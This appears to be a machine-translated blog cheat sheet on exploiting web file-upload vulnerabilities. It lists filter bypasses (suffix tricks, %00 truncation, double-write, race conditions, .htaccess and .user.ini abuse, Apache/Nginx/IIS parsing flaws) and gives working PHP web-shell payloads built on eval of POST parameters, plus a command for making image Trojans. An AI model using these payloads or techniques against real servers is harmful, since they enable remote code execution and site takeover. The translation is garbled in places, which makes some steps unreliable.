当前位置：网站首页>File upload vulnerability summary

File upload vulnerability summary

2022-07-28 06:14:00 【cainsoftware】

1. Front end with js Judge that the backend does not check , Direct packet capture bypass ;

2.Content-type Fields can be modified to bypass ;

3. Dangerous executable suffix ：

.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess

4. Case around ：.PHP

5. Close and empty payload: spot +php+ spot + Space + spot

6.str_isreplace() Replace the characteristic value string with empty , You can use Double writing bypasses .pphphp

7. GET Upload files , But the upload path can be modified url Add suffix phpinfo.php%00 Bypass

8. POST Upload files , But the upload file path is controllable %00 To transcode

9. read File string detection To determine the file type detection method , Generate picture Trojan horse Bypass

Generating statement ：

copy logo.jpg/b+test.php/a test.jpg

10. Document content detection <? Judge

<script language="php">@eval($_POST['pwd']);phpinfo();</script>

11.PUT Protocol upload file , For nothing shell

Windows System features

1. File name suffix plus space and . windows Automatic filtering .

2. ::$DATA Is automatically removed by default

Linux System features

1.Linux It is to judge the file type according to the file header and file content , So as long as the file contains the file header , No matter 4 Byte and 8 Bytes will be considered as image files by the system .

Logical loopholes （ Conditional competition ）

1. File upload to server rename Modify the file and pass unlink Delete file ; So we can directly burp Always submit and always access the other side to generate the export shell;

Payload:

<?php fputs(fopen('shell.php','w'),'<[email protected]($_POST["cmd"])?>');?>

2. Non whitelist upload file , Judge that there are too many filter functions , That is, a large number of pictures are frequently lost , Cause his server to queue up and overflow , File upload

3.$file Determine whether it is an array , You can enter array variables in advance in the file content to bypass .

4. For cloud lock, there is a sense of user experience , Use a lot of junk characters /**11111111**/ fill , Make the file too large beyond his detection range

5.htaccess apache Pseudo static configuration file , Allowing jpg give php Execute permission of

6.user.ini by LAMP stay nginx Use... In the environment

① there .user.ini File means to include all files in the current directory php File parsing

② Well structured .user,ini After the document , It is renamed .user.ini

③ Upload picture horse

④ Upload .user.ini

⑤ visit php File is available shell

Function properties

str_isreplace(): Double writing bypasses

getimagesize(): Picture horse bypassing

Imagecreatefromgif(): 16 Hexadecimal transmission gif Compare uploaded files hex Insert the horse in the same position

exif_imagetype():

Picture horse

To set up .htaccess Define height and width

#define width 100

#define height 100

3. utilize x00x00x8ax39x8ax39

File parsing vulnerability feature

Apache: xxx.php.jpg

File parsing starts from right to left , If the suffix of the file is unrecognized , Just to the left Therefore, the file name can be uploaded xxx.php.222 Bypass

Nginx:Xxx.jpg%00xx.php

Nginx(0.5.,0.6., 0.7 ~ 0.7.65, 0.8~ 0.8.37):

url/xx.jpg%00.php

url/a.jpg%00\0.php

IIS 5.x/6.0 Parsing vulnerabilities :xxx.asp;.jpg

IIS 6.0 Default resolution :asp、asa、cer、cdx The file is the execution file

IIS 7.0/IIS 7.5/ Nginx <0.8.3 Start by default Fast-CGI url/xx.jpg/.php